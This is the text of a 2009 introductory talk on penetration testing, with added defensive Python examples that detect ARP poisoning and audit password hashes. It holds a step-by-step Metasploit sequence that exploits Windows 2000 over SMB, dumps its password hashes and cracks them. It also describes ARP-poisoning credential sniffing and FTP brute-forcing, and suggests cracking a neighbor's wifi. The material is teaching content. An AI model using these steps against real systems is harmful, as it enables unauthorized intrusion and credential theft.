Hack Attack! An Introduction to Penetration Testing. Steve Phillips (aka fraktil), 2009.12.17 @ SBLUG


Page 1: Hack Attack! An Introduction to Penetration Testing

Hack Attack! An Introduction to Penetration Testing

Steve Phillips (aka fraktil), 2009.12.17 @ SBLUG

Page 2

Who Am I?

● Attended UCSB 2004-2008
  – Majored in Math and Philosophy, not CS
● Started using Linux in 2001
  – Mandrake, then Slackware, then Debian
● Applying for penetration testing job in January
● Biases/“Preferences”
  – Linux > Windoze (duh)
  – Python > Ruby
  – Emacs > vi
  – Debian (and variants) > others

Page 3

Can Hacking Be Ethical? Or, What Is Ethical Hacking?

● Black Hat
  – Compromises computer systems without permission
  – Criminal
● White Hat, aka Ethical Hacker
  – Gets paid to hack – legally (friggin' sweet)
  – Always gets permission before attacking a system
● Gray Hat
  – Some combination of Black and White

Page 4

The Stages of Hackerdom

● Script Kiddie (“skiddie”)
  – Can only run automated tools
  – Doesn't understand underlying technology
● Advanced Beginner
  – Mastered advanced features of many tools
  – Knows enough programming to create own tools
    ● C => Python, Ruby (see next slide)
● Uberhacker
  – Discovers new vulnerabilities (or new types of vulns)
  – Knows Assembly, C, Python and/or Ruby, SQL
  – Excellent programmer; writes tools, scripts regularly
  – Can defend as well as attack (firewalls, IDS, etc)

Page 5

Programming Languages Used to Create Hacking Tools

● C
  – Nmap (network mapper, portscanner, more)
  – Nessus (vulnerability detection)
  – Wireshark (network sniffer)
● Python
  – w3af (web app attack framework)
  – sqlmap (automatic SQL injection)
  – TheMiddler (session hijacking, targeted pw sniffing)
● Ruby
  – Metasploit (vuln exploitation, much more)

Page 6

What About in Back|Track 4? Overall: Tools + Exploits

● File count: find /pentest | grep \\.c$ | wc -l
● Line count: cat $(find /pentest | grep \\.c$) | wc -l
● C: 4058 .c files, 1,300,000 lines
● Python: 2431 .py files, 612,000 lines
● Ruby: 5468 .rb files, 694,000 lines
  – 2773 files from Metasploit
  – 1271 files from Dradis (information organizing, sharing)
  – 1424 other
● C++: 431 .cpp files, 144,000 lines
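The two shell pipelines on this slide produce the per-language totals, but `cat $(find ...)` word-splits on paths containing spaces and `grep \.c$` also matches a directory whose name ends in `.c`. The script below is an added example, not part of the talk, that does the same tally for all four extensions at once by walking the tree and matching on each file's own extension. It builds a small constructed sample tree in a temporary directory instead of assuming a real `/pentest`; point `count_sources` at `/pentest` on a Back|Track box to reproduce the slide's numbers.

```python
"""Count source files and lines per language under a directory tree.

Added example (not from the slides). The sample tree is constructed;
the function itself works on any real path such as /pentest.
"""
import os
import tempfile

# Extensions tallied on the slide, mapped to the language name.
LANG_EXTS = {".c": "C", ".py": "Python", ".rb": "Ruby", ".cpp": "C++"}


def count_sources(root, exts=LANG_EXTS):
    """Walk `root`; return {language: (file_count, line_count)}.

    Matching on os.path.splitext of the file name means directories are
    never counted, and reading each file directly avoids the
    word-splitting that `cat $(find ...)` suffers on paths with spaces.
    """
    totals = {lang: [0, 0] for lang in exts.values()}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            lang = exts.get(os.path.splitext(name)[1].lower())
            if lang is None:
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    lines = sum(1 for _ in fh)  # same count as wc -l
            except OSError:
                continue  # unreadable file: skip rather than abort
            totals[lang][0] += 1
            totals[lang][1] += lines
    return {lang: tuple(v) for lang, v in totals.items()}


def build_sample_tree():
    """Create a constructed mini /pentest-like tree; returns its path."""
    root = tempfile.mkdtemp(prefix="pentest_sample_")
    samples = {
        "exploits/a.c": "int main(void){\nreturn 0;\n}\n",
        "exploits/dir with space/b.c": "/* two lines */\n\n",
        "web/w3af.py": "print('hi')\n",
        "web/sql map.py": "import sys\nsys.exit(0)\n",
        "msf/x.rb": "puts 1\n",
        "misc/t.cpp": "#include <cstdio>\nint main(){}\n",
        "notes/README": "not counted\n",
    }
    for rel, body in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    sample_root = build_sample_tree()
    for lang, (nfiles, nlines) in sorted(count_sources(sample_root).items()):
        print(f"{lang:7s} {nfiles:4d} files {nlines:7d} lines")
```

On the constructed tree this reports C with 2 files and 5 lines, Python with 2 files and 3 lines, Ruby 1/1 and C++ 1/2; the file in `dir with space` and `sql map.py` are counted correctly, which the slide's `cat $(find ...)` form would not manage.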

Page 7

What About in Back|Track 4? Exploits Only (from exploitdb)

● C
  – 1321 .c files
● Python
  – 405 .py files
● Ruby
  – 146 .rb files
● C++
  – 110 .cpp files

Page 8

TIOBE Index: Programming Language Popularity

Page 9

Back|Track 4 Categories

● Information Gathering
  – Email addresses, DNS
● Network Mapping
● Vulnerability Identification
● Web Application Analysis
● Radio Network Analysis
● Penetration (not that kind)

Page 10

Back|Track 4 Categories

● Privilege Escalation
● Maintaining Access
● Digital Forensics
● Reverse Engineering
● VoIP (Voice over Internet Protocol)
● Misc

Page 11

DEMO: Sniffing Passwords with Ettercap

● ARP Poisoning for MitM Attack
  – Associate attacker's MAC with router's IP
  – Target tries to route traffic through router
    ● Routes it through attacker instead
  – Attacker forwards traffic both ways
  – Attacker can silently watch or inject traffic
● TheMiddler, sslstrip
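The poisoning described on this slide leaves a concrete trace on the wire: the router's IP address starts being answered from a second MAC address. The class below is an added example, not part of the talk or of Ettercap, of the arpwatch-style check a defender runs to catch it: remember the first MAC seen for each IP and raise an alert when an IP later claims a different one, with higher severity for addresses you designate as gateways. The ARP replies are a constructed sample; in a real deployment you would feed the same `observe` method from a packet sniffer or from periodic parsing of the host's ARP cache.

```python
"""Detect ARP cache poisoning from observed ARP replies.

Added example (not from the slides). `ArpReply` and the sample traffic
below are constructed; the detection logic mirrors what arpwatch does.
"""
from collections import namedtuple

# One observed ARP reply: timestamp, the IP being claimed, the MAC claiming it.
ArpReply = namedtuple("ArpReply", "ts sender_ip sender_mac")


class ArpWatcher:
    """Track IP -> MAC bindings and flag any change.

    A gateway IP that suddenly answers from a new MAC is the signature of
    the ARP-poisoning MitM on this slide. Bindings of `protected_ips`
    (gateways, DNS servers) produce HIGH severity; everything else LOW,
    since DHCP churn can legitimately move an ordinary IP between hosts.
    """

    def __init__(self, protected_ips):
        self.protected = set(protected_ips)
        self.bindings = {}   # ip -> MAC first seen for that ip
        self.alerts = []     # (ts, severity, ip, old_mac, new_mac)

    def observe(self, reply):
        """Record one ARP reply; return an alert tuple or None."""
        mac = reply.sender_mac.lower()
        known = self.bindings.get(reply.sender_ip)
        if known is None:
            self.bindings[reply.sender_ip] = mac
            return None
        if known == mac:
            return None
        severity = "HIGH" if reply.sender_ip in self.protected else "LOW"
        alert = (reply.ts, severity, reply.sender_ip, known, mac)
        self.alerts.append(alert)
        return alert


def run_sample():
    """Replay constructed traffic: the gateway 192.168.1.1 is legitimately at
    aa:bb:cc:00:00:01, then a second host begins answering for it."""
    sample = [
        ArpReply(1, "192.168.1.1", "aa:bb:cc:00:00:01"),
        ArpReply(2, "192.168.1.50", "aa:bb:cc:00:00:50"),
        ArpReply(3, "192.168.1.1", "aa:bb:cc:00:00:01"),   # consistent, no alert
        ArpReply(4, "192.168.1.1", "de:ad:be:ef:00:99"),   # gateway now at new MAC
        ArpReply(5, "192.168.1.50", "aa:bb:cc:00:00:50"),
    ]
    watcher = ArpWatcher(protected_ips=["192.168.1.1"])
    for reply in sample:
        watcher.observe(reply)
    return watcher.alerts


if __name__ == "__main__":
    for ts, sev, ip, old, new in run_sample():
        print(f"t={ts} {sev}: {ip} moved from {old} to {new}")
```

The single alert this produces is the HIGH-severity move of 192.168.1.1 at t=4. The usual mitigations are a static ARP entry for the gateway on critical hosts and Dynamic ARP Inspection on managed switches; note that neither helps against sslstrip once the traffic is already being relayed, which is why the slide pairs the two tools.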

Page 12

How Else Can We Get Creds?

● Phishing
  – Via email
● Spear Phishing
  – Becoming popular
  – Very hard to stop
● In-person Social Engineering
  – Kevin Mitnick is famous for this
● Brute force

Page 13

DEMO: Bruteforcing FTP

● Using Hydra to bruteforce weak FTP password
  – Well, really a dictionary attack

Page 14

DEMO: Pwning Win2k

● Create database (or connect to existing)
  – db_create [optional_database_name]
● Find win2k box using nmap (in metasploit)
  – db_nmap -sV -p 135,139,445 xxx.xxx.xxx.0/24
● Search Metasploit for win2k exploits
  – search 2000
● Use exploit w/meterpreter
  – use exploit/windows/smb/ms05_039_pnp
  – set PAYLOAD windows/meterpreter/bind_tcp
● Which parameters still need to be set?
  – show options

Page 15

DEMO: Pwning Win2k

● Set parameters
  – set RHOST [target_ip]
● Now we exploit! Can you guess the command?
  – exploit
● Get hashes
  – hashdump
  – This would be much harder without meterpreter!
● Copy and paste hashes into new text file
● Crack hashes with john the ripper
  – ./john [file_containing_hashes].txt
● Game Over
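The file that `hashdump` produces and john consumes has one `user:RID:LM:NT:::` line per account, and the reason the demo ends so quickly is usually visible in that file before cracking starts. The script below is an added example, not part of the talk or of Metasploit, of how a defender reads such a dump after an authorized test: it parses the format and reports accounts that still have an LM hash stored (the policy defect that makes them trivially crackable), accounts with an empty password, and accounts sharing one NT hash (one cracked password opens all of them). The dump is constructed; only the two constants for the hash of the empty string are real values.

```python
"""Audit a pwdump/hashdump-format file for weak credential storage.

Added example (not from the slides). SAMPLE_DUMP is constructed; the
32-hex-digit values in it are placeholders, except EMPTY_LM / EMPTY_NT,
which are the real LM and NT hashes of the empty password.
"""

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of "" (= no LM hash stored)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of ""

SAMPLE_DUMP = """\
# constructed sample, user:rid:LM:NT:::
Administrator:500:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
backup:1001:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
svc_backup:1002:00112233445566778899aabbccddeeff:ffeeddccbbaa99887766554433221100:::
"""


def parse_hashdump(text):
    """Yield (user, rid, lm, nt) for each well-formed dump line."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) < 4:
            continue   # not a hashdump record; ignore
        user, rid, lm, nt = parts[0], parts[1], parts[2].lower(), parts[3].lower()
        yield user, rid, lm, nt


def audit(text):
    """Return (user, finding) tuples describing weak storage or weak passwords."""
    findings = []
    first_user_with_nt = {}   # nt hash -> first account seen using it
    for user, _rid, lm, nt in parse_hashdump(text):
        if lm != EMPTY_LM:
            # LM hashes are case-folded, split into two 7-char halves and
            # unsalted; john recovers them in minutes. Fix: NoLMHash policy
            # plus a password change so the stored LM value is cleared.
            findings.append((user, "LM_HASH_STORED"))
        if nt == EMPTY_NT:
            findings.append((user, "EMPTY_PASSWORD"))
        if nt in first_user_with_nt:
            findings.append((user, f"SHARED_PASSWORD_WITH:{first_user_with_nt[nt]}"))
        else:
            first_user_with_nt[nt] = user
    return findings


if __name__ == "__main__":
    for user, finding in audit(SAMPLE_DUMP):
        print(f"{user:15s} {finding}")
```

On the sample this flags Administrator and svc_backup for stored LM hashes, Guest for an empty password, and backup for sharing Administrator's password. Each finding maps to a remediation a defender can act on before the cracking run finishes: enforce NoLMHash, disable or password-protect Guest, and break the password reuse between the two accounts.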

Page 16

Why Become an Ethical Hacker?

● Field is growing (see next slide)
  – New laws, regulations
  – US government falling behind in cyber security
● You get paid to hack – need I say more?
  – Banks
  – Telecoms
  – Casinos
  – Foreign countries (for the federal gov't)

Page 17

Page 18

How Can I Practice Legally?

● Virtualization (VMware, VirtualBox)
  – Use virtual images from recent CTF competitions
    ● http://lampsecurity.org/capture-the-flag-6
    ● http://ctf.hcesperer.org/25c3ctf
    ● http://ctf.hcesperer.org/daopen08
    ● http://ctf.hcesperer.org/eh08ctf
● NetWars
  – Part of government's Cyber Defense Initiative 2009
● DVL: Damn Vulnerable Linux
  – Purposely misconfigured, exploitable
  – http://tinyurl.com/dvllinux15

Page 19

Further Resources: Learning

● Metasploit
  – Online Class: http://www.offensive-security.com/metasploit-unleashed/
● Nmap Guide
  – http://nmap.org/book/man.html
● Security Videos, Tutorials
  – http://securitytube.net

Page 20

Tools Added to Back|Track: Extra Tools I Used

● Metasploit 3.3.2 (updated)
● Nmap 5.0 (updated)
● Exploitdb archive (/pentest/exploits/exploitdb)

Page 21

Summary

● Hacking can be ethical
● “Computer security” is an oxymoron
  – No one is safe
● REALLY powerful hacking tools exist
● Metasploit is effing dangerous

Page 22

Future Demos?

● More local fun
  – Crack neighbor's wifi (WEP)
  – Exploit remote vuln in DD-WRT firmware
  – Redirecting traffic using fake DNS server
  – Intercepting Twitter, Facebook, LinkedIn creds
● More like real pen testing
  – SQL injection
  – XSS
  – Nessus scan

Page 23

Contact Information

● Name: Steve Phillips
● New Blog: SweetHack.blogspot.com
● Email: [email protected]
● Twitter: twitter.com/fraktil
● LinkedIn: linkedin.com/in/sdphillips
● IRC: fraktil in #sblug on borg-cube.com

Page 24

Questions?